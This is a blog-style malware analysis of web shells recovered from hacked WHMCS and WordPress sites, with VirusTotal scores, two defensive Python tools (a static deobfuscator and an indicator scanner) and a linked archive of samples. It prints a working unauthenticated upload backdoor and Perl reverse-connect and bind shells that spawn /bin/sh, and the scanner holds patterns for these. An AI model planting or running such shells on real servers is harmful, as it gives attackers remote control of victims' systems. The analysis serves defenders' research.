
Some interesting malicious PHP files

16 September 2013

Hello fellow internet citizens (and bots)

Here are some interesting malicious PHP files I found in one hacked WHMCS installation and one hacked WordPress site.

Note #1: they are mostly not the result of one hack/hacker but of several.
Note #2: these files are harmful; running them on your own computer is not advised, and they are supplied for research purposes only.

Here are the files: click here (archive password: infected)

The most interesting file is r.php (VirusTotal scan: 3/48): it is "WHMCS Killer" by rab3oun.


The decoding line is decoded to:


It reads the encoded junk that sits after the closing PHP tag back out of its own file and decodes it 4 times before running it, so the real code never appears in clear text on disk.
The decoded version (which is still hard to read) is included as r_DECODED.php. Surprisingly, the encoded loader is detected by 3 antivirus engines while the decoded original is not detected at all (0/46): the engines are matching the obfuscation wrapper, not the shell itself.

Next file is 825451_n2n.jpg (VirusTotal scan: 5/46), a nice shell that's obfuscated twice and, as the extension shows, parked under an image name so it looks like an upload.
It originally looks like this:

<?php $_F=__FILE__;$_X='Pz48P3BocA0KNX1IDR[TOO_LONG]4NCg==';

The second line decodes to:


Decoding it again (decoding $_X) yields a full-featured shell, included as 825451_n2n_DECODED.php (VirusTotal scan: 7/44).
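Both loaders above use the same trick: r.php reads the junk appended after its own closing tag and decodes it four times, and 825451_n2n.jpg stacks its payload into $_X. In each case the real shell is wrapped in a few reversible encodings and handed to eval. The safe way to get at the payload is to peel the layers statically instead of running the file. The script below is an added example, not code from this post or from the archive; it assumes only base64 and gzinflate (raw DEFLATE) layers, which covers the common eval(base64_decode(gzinflate(...))) family, and it builds its own two sample files so it runs offline. The exact layering of r.php and whatever extra transform 825451_n2n.jpg applies are not reproduced; a sample that uses another step (a character substitution, say) needs its own layer function in peel_once.

```python
"""Peel reversible encoding layers off an obfuscated PHP loader without executing it.

Added example: handles the two loader shapes seen above, a blob appended after the
closing ?> tag (read back through __FILE__) and a base64 string assigned to $_X.
Only base64 and gzinflate (raw DEFLATE) layers are assumed; the sample files below
are constructed here and are not the files from the post.
"""
import base64
import re
import zlib

MAX_LAYERS = 16
B64_RE = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")
XVAR_RE = re.compile(rb"\$_X\s*=\s*'([A-Za-z0-9+/=]+)'")


def trailing_payload(src: bytes) -> bytes:
    """Everything after the last '?>' in the file: the 'junk' a self-reading
    loader like r.php seeks to before decoding."""
    idx = src.rfind(b"?>")
    return src[idx + 2:].strip() if idx != -1 else b""


def x_var_payload(src: bytes) -> bytes:
    """The base64 blob assigned to $_X in the $_F=__FILE__;$_X='...' loader family."""
    m = XVAR_RE.search(src)
    return m.group(1) if m else b""


def peel_once(data: bytes):
    """Apply one decoding layer; return (layer_name, decoded) or None if nothing fits."""
    compact = b"".join(data.split())          # PHP's base64_decode ignores whitespace
    if B64_RE.match(compact) and len(compact) % 4 == 0:
        try:
            return "base64", base64.b64decode(compact, validate=True)
        except ValueError:
            pass
    try:
        return "gzinflate", zlib.decompress(data, -15)   # -15: raw DEFLATE, as PHP gzinflate()
    except zlib.error:
        return None


def peel(data: bytes):
    """Decode repeatedly until PHP source appears or no known layer applies.
    Returns (list of layer names in decode order, final bytes)."""
    layers = []
    for _ in range(MAX_LAYERS):
        if b"<?php" in data:                  # reached readable source; stop here
            break
        step = peel_once(data)
        if step is None:
            break
        name, data = step
        layers.append(name)
    return layers, data


def analyse(src: bytes) -> dict:
    """Run both extractors over one file's bytes and peel whatever they find."""
    found = {}
    for where, blob in (("after_close_tag", trailing_payload(src)),
                        ("x_var", x_var_payload(src))):
        if blob:
            found[where] = peel(blob)
    return found


# --- constructed samples (not the post's files) --------------------------------
INNER = b"<?php echo 'payload reached'; ?>"


def build_trailing_sample() -> bytes:
    """A stub that reads itself via __FILE__, followed by INNER wrapped in base64 four
    times, mirroring the 'decodes it 4 times' description of r.php."""
    blob = INNER
    for _ in range(4):
        blob = base64.b64encode(blob)
    stub = b"<?php $d=file_get_contents(__FILE__); /* decoding loop elided */ ?>\n"
    return stub + blob


def build_xvar_sample() -> bytes:
    """The $_F=__FILE__;$_X='...' shape with INNER deflated, then base64-encoded."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)     # raw DEFLATE = PHP gzdeflate()
    blob = base64.b64encode(comp.compress(INNER) + comp.flush())
    return b"<?php $_F=__FILE__;$_X='" + blob + b"';eval(base64_decode(/* elided */));?>"


if __name__ == "__main__":
    for name, sample in (("trailing", build_trailing_sample()), ("x_var", build_xvar_sample())):
        for where, (layers, final) in analyse(sample).items():
            print(f"{name}/{where}: {' -> '.join(layers)} => {final[:60]!r}")
```

The loop stops as soon as `<?php` shows up in the decoded bytes, which is the point at which you hand the result to a text editor; if a real sample stops with a blob that is neither base64 nor DEFLATE, that is the signal that it uses a layer this script does not know about.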

Next file is b0x.php (VirusTotal scan: 0/47), a simple upload script that wasn't obfuscated at all. There is no authentication and no file-type check: whatever is posted is copied into the directory the script runs in, under the name the client supplied, which is all an attacker needs to drop a second-stage shell next to it.

<?php
// Prints a bare upload form; on POST, copies the temp file into the current
// directory under the client-supplied name (no auth, no extension check).
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
    // "SUKSES" / "GAGAL" are Indonesian for success / failed
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
    else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}

Next file is index.php (VirusTotal scan: 16/48), WSO Shell v2.3 by oRb; all of its custom function names start with WSO, which makes it easy to spot by grep.
It is not obfuscated except for two encoded chunks that are decoded at runtime, written to disk as Perl scripts and executed.
#1 Back-connect code $back_connect_p (decoded version included as bc.pl):

use Socket;
# usage: bc.pl <attacker host> <port>; the target host and port come from the command line
$iaddr=inet_aton($ARGV[0]) || die("Error: $!\n");
$paddr=sockaddr_in($ARGV[1], $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
# wire stdin/stdout/stderr to the socket, then hand the attacker an interactive shell
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system('/bin/sh -i');

#2 Port-binding script $bind_port_p (decoded version included as bp.pl):

$SHELL="/bin/sh -i";
if (@ARGV < 1) { exit(1); }   # usage: bp.pl <port>
use Socket;
socket(S,&PF_INET,&SOCK_STREAM,getprotobyname('tcp')) || die "Cant create socket\n";
bind(S,sockaddr_in($ARGV[0],INADDR_ANY)) || die "Cant open port\n";
listen(S,3) || die "Cant listen port\n";
while(1) {
  accept(CONN,S);   # CONN is the accepted client socket used below
  if(!($pid=fork)) {
    die "Cannot fork" if (!defined $pid);
    # child: attach the shell to the accepted connection
    open STDIN,"<&CONN";
    open STDOUT,">&CONN";
    open STDERR,">&CONN";
    exec $SHELL || die print CONN "Cant execute $SHELL\n";
    close CONN;
    exit 0;
  }
}

Next file is index (2).php (VirusTotal scan: 26/47), a variant of the well-known r57 shell (variant by SnIpEr_SA), also not obfuscated.

Next file is install.php (VirusTotal scan: 1/46), an obfuscated copy of webadmin.php, a legitimate web admin/file-management script that attackers nonetheless abuse as a shell.
And I am not sure why he even obfuscated it; the clean version is also detected by one antivirus engine.

Next file is New.php (VirusTotal scan: 1/48), which is obfuscated.
It decodes to New_DECODED.php (VirusTotal scan: 28/45) and turns out to be another r57 shell variant (by tryag); again the wrapper, not the shell, is what keeps the detection count low.

Next file is SaD.php (VirusTotal scan: 8/45), a normal PHP shell with nothing significant about it, but it's the first time I have seen it.

Next file is xx.php (VirusTotal scan: 6/46), a cPanel/FTP brute-forcing tool.
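Taken together, the samples above share a handful of textual fingerprints: the $_F=__FILE__;$_X= loader prologue, eval() wrapped around a decoder, a script that reads its own file, PHP code hiding under an image extension, an upload handler that copy()s straight out of $_FILES into a client-chosen name, the WSO function prefix, and the Perl "use Socket" back-connect/bind snippets that spawn /bin/sh -i. The scanner below is an added example rather than anything from this post or the archive: the regexes are my own reading of those fingerprints, and the files it checks itself against are constructed stand-ins, not the real samples. It is a triage tool, not a verdict; expect to tune the patterns against your own code base.

```python
"""Indicator scan for the PHP/Perl web-shell families catalogued above.

Added example, not code from the post: the regexes are my own reading of the
fingerprints described there, and the SAMPLES at the bottom are constructed
for the self-test, not the real files.
"""
import re
import sys
from pathlib import Path

PHP_EXTENSIONS = {".php", ".phtml", ".php3", ".php4", ".php5", ".inc"}

# (label, compiled pattern) pairs; each maps to one behaviour seen in the samples
INDICATORS = [
    ("$_F=__FILE__;$_X= loader prologue",
     re.compile(rb"\$_F\s*=\s*__FILE__\s*;\s*\$_X\s*=")),
    ("eval() over a decoder",
     re.compile(rb"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")),
    ("script reads its own file",
     re.compile(rb"(?:file_get_contents|fopen|file)\s*\(\s*__FILE__\s*[,)]")),
    ("copy() of upload to client-chosen name",
     re.compile(rb"copy\s*\(\s*\$_FILES\[[^\]]+\]\[\s*['\"]tmp_name['\"]\s*\]"
                rb"\s*,\s*\$_FILES\[[^\]]+\]\[\s*['\"]name['\"]\s*\]")),
    ("WSO-prefixed function names",
     re.compile(rb"function\s+wso[A-Za-z0-9_]*\s*\(", re.IGNORECASE)),
    ("interactive /bin/sh spawn",
     re.compile(rb"/bin/sh\s+-i")),
    ("Perl socket back-connect or bind",
     re.compile(rb"use\s+Socket\s*;.*?(?:connect|bind)\s*\(", re.DOTALL)),
]
B64_ALPHABET = re.compile(rb"[A-Za-z0-9+/=\s]+")
MIN_TAIL = 64   # base64-ish bytes after the last ?> before we call it an appended payload


def scan_bytes(filename: str, data: bytes) -> list:
    """Return the indicator labels that fire for one file's contents, in INDICATORS order,
    followed by the two structural checks (wrong extension, payload after ?>)."""
    hits = [label for label, rx in INDICATORS if rx.search(data)]
    ext = Path(filename).suffix.lower()
    if b"<?php" in data and ext not in PHP_EXTENSIONS:
        hits.append(f"PHP code in non-PHP file ({ext or 'no extension'})")
    idx = data.rfind(b"?>")
    tail = data[idx + 2:].strip() if idx != -1 else b""
    if len(tail) >= MIN_TAIL and B64_ALPHABET.fullmatch(tail):
        hits.append("base64-looking blob after closing ?> tag")
    return hits


def scan_tree(root: str) -> dict:
    """Walk a directory and map each flagged path to its indicator labels."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file():
            hits = scan_bytes(path.name, path.read_bytes())
            if hits:
                findings[str(path)] = hits
    return findings


# --- constructed self-test files, loosely shaped after the samples in the post ---
SAMPLES = {
    "825451_n2n.jpg": b"<?php $_F=__FILE__;$_X='UEhQ';eval(base64_decode('ZWNobyAx'));?>",
    "b0x.php": (b"<?php if($_POST['_upl']==\"Upload\"){"
                b"if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name']))"
                b"{echo 'ok';}} ?>"),
    "index.php": (b"<?php function wsoEx($c){ return shell_exec($c); }\n"
                  b"$back_connect = \"use Socket;\n$paddr=sockaddr_in($ARGV[1],$iaddr);\n"
                  b"connect(SOCKET,$paddr);system('/bin/sh -i');\";\n?>"),
    "r.php": b"<?php $d=file_get_contents(__FILE__); /* decoder elided */ ?>\n" + b"QUJD" * 40,
    "clean.php": b"<?php echo htmlspecialchars($_GET['q'] ?? ''); ?>",
}


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, hits in scan_tree(sys.argv[1]).items():
            print(path, "->", "; ".join(hits))
    else:
        for name, blob in SAMPLES.items():
            print(name, "->", "; ".join(scan_bytes(name, blob)) or "clean")
```

Run it with a web root as the only argument to walk the tree, or with no arguments to exercise the built-in samples. The structural checks are the ones that catch what signature scanning missed above: r.php's shell was 0/46 on VirusTotal once decoded, but a PHP file whose last closing tag is followed by a hundred bytes of base64 alphabet is unusual enough to deserve a look regardless of what it decodes to.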

That’s it, enjoy!
